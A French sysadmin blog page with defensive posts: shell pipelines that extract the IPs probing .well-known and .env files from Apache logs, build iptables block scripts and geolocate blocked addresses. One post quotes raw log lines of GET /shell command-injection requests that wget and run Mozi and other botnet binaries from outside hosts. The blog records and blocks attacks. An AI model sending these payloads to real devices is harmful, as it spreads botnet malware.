Archives de catégorie : Sécurité

Liste des IP qui essayent de sniffer le fichier .well-known

Publié le par
Répondre

J’ai donc fait un script :

# zgrep ".well-known" /var/log/apache2/error.humhub.log.*gz | sed 's/:/ /g' | awk '{print $14}' | sort -n | uniq | awk '{print "iptables -A INPUT -s " $1 " -j DROP "}'
iptables -A INPUT -s 80.82.77.139 -j DROP 
iptables -A INPUT -s 80.82.77.33 -j DROP 
iptables -A INPUT -s 125.64.94.138 -j DROP 
iptables -A INPUT -s 185.142.236.35 -j DROP 
iptables -A INPUT -s 185.142.236.40 -j DROP 
iptables -A INPUT -s 185.142.236.43 -j DROP
# zgrep ".well-known" /var/log/apache2/error.humhub.log.*gz | sed 's/:/ /g' | awk '{print $14}' | sort -n | uniq | awk '{print "iptables -A INPUT -s " $1 " -j DROP "}' > script_filter_scan_well-know.bash
# echo "iptables-save > /etc/iptables/rules.v4" >> script_filter_scan_well-know.bash
# chmod +x script_filter_scan_well-know.bash
# ./script_filter_scan_well-know.bash

Et voila 6 nouvelles IP qui sont filtrés … quasiment tout venant des Pays-Bas …. Misère.

 

Quels sont les pays des IP de mon fichier /etc/iptables/rules.v4 ?

Publié le par
Répondre

Facile il sufit de faire la commande :

# cat /etc/iptables/rules.v4 | grep "DROP" | awk '{print $4}' | sed 's/\// /g' | awk '{print $1}' | xargs -n 1 geoiplookup { } | sort | uniq -c | sort -n | sed -r 's/ GeoIP Country Edition://g'
      1 AT, Austria
      1 BR, Brazil
      1 CZ, Czech Republic
      1 GR, Greece
      1 IE, Ireland
      1 JP, Japan
      1 PH, Philippines
      1 TT, Trinidad and Tobago
      1 UG, Uganda
      2 ID, Indonesia
      2 IR, Iran, Islamic Republic of
      2 IT, Italy
      2 MX, Mexico
      2 MY, Malaysia
      2 SG, Singapore
      2 TR, Turkey
      2 TW, Taiwan
      3 CA, Canada
      3 GB, United Kingdom
      3 NL, Netherlands
      3 VN, Vietnam
      4 DE, Germany
      4 EG, Egypt
      4 FR, France
      4 KR, Korea, Republic of
      5 RU, Russian Federation
      9 IN, India
     11 IP Address not found
     28 CN, China
     43 US, United States

En tête les US …. Misère. A noter qu’il y a des IP en France que je filtre :

Localisation France
Réputation 86 %
Anonymat Aucun détection
Usage Attribué
Source RIPE NCC
Nom d’hote 134.119.189.155 => VELIANET-FR-PUSHPENDERCHUHAN
Localisation France
Réputation 86 %
Anonymat Aucun détection
Usage Attribué
Source RIPE NCC
Nom d’hote ip28.ip-51-210-137.eu => StarkRDP Service
Localisation France
Réputation 86 %
Anonymat Aucun détection
Usage Attribué
Source RIPE NCC
Nom d’hote 151.106.8.41 => VELIANET-FR-CYBERGHOSTSRL

Liste des IP qui essayent de sniffer le .env (Variables d’environnements)

Publié le par
Répondre

Voici la commande et la liste des IP qui font un scan sur .env :

# zgrep ".env" /var/log/apache2/error.humhub.log.*gz | sed 's/:/ /g' | awk '{print $14}' | sort -n | uniq -c
      1 2.57.122.53    
      2 3.19.213.88
      3 20.199.123.240
      2 20.68.241.118
      2 23.101.199.109
      1 35.202.212.64
      2 40.121.11.29
      1 40.87.87.96
      1 40.89.150.92
      1 45.77.214.38
      1 51.141.166.84
      2 51.210.137.28
      2 52.149.128.42
      1 52.175.210.216
      1 52.249.196.150
      1 80.241.212.242
      2 104.154.217.152
      2 104.198.135.4
      2 108.59.10.20
      1 115.78.14.240
      1 118.101.194.141
      1 128.31.0.13
      2 134.119.189.155
      1 144.202.53.77
      1 148.64.121.254
      2 149.28.84.31
      1 157.245.77.151
      1 172.93.128.215
      1 178.128.104.205
      1 189.203.106.65
      1 190.83.155.186
      1 192.46.223.53
      2 193.111.76.162
      1 194.116.73.192
      1 199.117.154.162
      1 210.66.16.184
      1 212.154.7.246

Propriété de l’adresse IP 2.57.122.53

Localisation Pays-Bas
Réputation 71 %
Anonymat Aucun détection
Usage Attribué
Source RIPE NCC
Nom d’hote 2.57.122.53

Propriété de l’adresse IP 3.19.213.88

Localisation États-Unis
Réputation 100 %
Anonymat Aucun détection
Usage Attribué
Source ARIN
Nom d’hote ec2-3-19-213-88.us-east-2.compute.amazonaws.com

Dans les IP certaines ont une réputations de 100% … Misère.
Pour faire la création du script :

# zgrep ".env" /var/log/apache2/error.humhub.log.*gz | sed 's/:/ /g' | awk '{print $14}' | sort -n | uniq | awk '{print "iptables -A INPUT -s " $1 " -j DROP "}' > script_filter_scan_env.bash
# echo "iptables-save > /etc/iptables/rules.v4" >> script_filter_scan_env.bash
# chmod +x script_filter_scan_env.bash
# ./script_filter_scan_env.bash

Liste des IP qui font des attaques de type GET /shell

Publié le par
Répondre

Voici la liste :

61.242.40.137 - - [31/May/2021:06:04:31 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
27.45.11.127 - - [31/May/2021:06:52:00 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://27.45.11.127:48083/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
209.141.33.232 - - [21/May/2021:03:57:39 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
182.121.231.1 - - [21/May/2021:04:07:59 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://182.121.231.1:59816/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
209.141.33.232 - - [21/May/2021:13:18:53 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
209.141.33.232 - - [21/May/2021:14:34:29 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
223.149.149.208 - - [21/May/2021:22:16:38 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
103.203.72.91 - - [20/May/2021:06:12:05 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
119.123.236.177 - - [20/May/2021:15:52:53 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://119.123.236.177:38918/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
117.241.51.177 - - [18/May/2021:17:30:58 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://117.241.51.177:45448/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
27.5.37.175 - - [18/May/2021:19:41:00 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://27.5.37.175:46657/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
59.97.193.131 - - [17/May/2021:06:05:42 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://59.97.193.131:57363/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
138.204.132.98 - - [28/May/2021:20:03:35 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ http://212.192.241.127/eb0t.sh;chmod+777+/tmp/eb0t.sh;sh+/tmp/eb0t.sh" 400 0 "-" "-"
59.63.206.200 - - [26/May/2021:00:59:08 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://101.232.115.188:57082/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
114.33.156.230 - - [26/May/2021:09:57:41 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://114.33.156.230:59246/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
68.150.109.112 - - [26/May/2021:17:05:02 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86;chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86+w00dy.jaws HTTP/1.1" 404 488 "-" "Hello, world"
209.141.33.232 - - [25/May/2021:02:00:39 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
209.141.33.232 - - [24/May/2021:03:15:26 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
209.141.33.232 - - [24/May/2021:05:17:24 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
209.141.33.232 - - [23/May/2021:11:11:12 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
209.141.33.232 - - [22/May/2021:12:33:25 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"

A noter que l’IP 45.14.149.244 est en Roumanie et 27.45.11.127 est en Chine.

Bilan :

iptables -A INPUT -s 45.14.149.244   -j DROP 
iptables -A INPUT -s 209.141.33.232   -j DROP
iptables -A INPUT -s 68.150.109.112    -j DROP 
iptables -A INPUT -s 114.33.156.230    -j DROP
iptables -A INPUT -s 59.63.206.200    -j DROP 
iptables -A INPUT -s 59.97.193.131    -j DROP
iptables -A INPUT -s 117.241.51.177    -j DROP
iptables -A INPUT -s 119.123.236.177     -j DROP
iptables -A INPUT -s 27.5.37.175    -j DROP
iptables -A INPUT -s 27.45.11.127    -j DROP
iptables -A INPUT -s 61.242.40.137     -j DROP
iptables -A INPUT -s 182.121.231.1      -j DROP
iptables-save > /etc/iptables/rules.v4

Misère.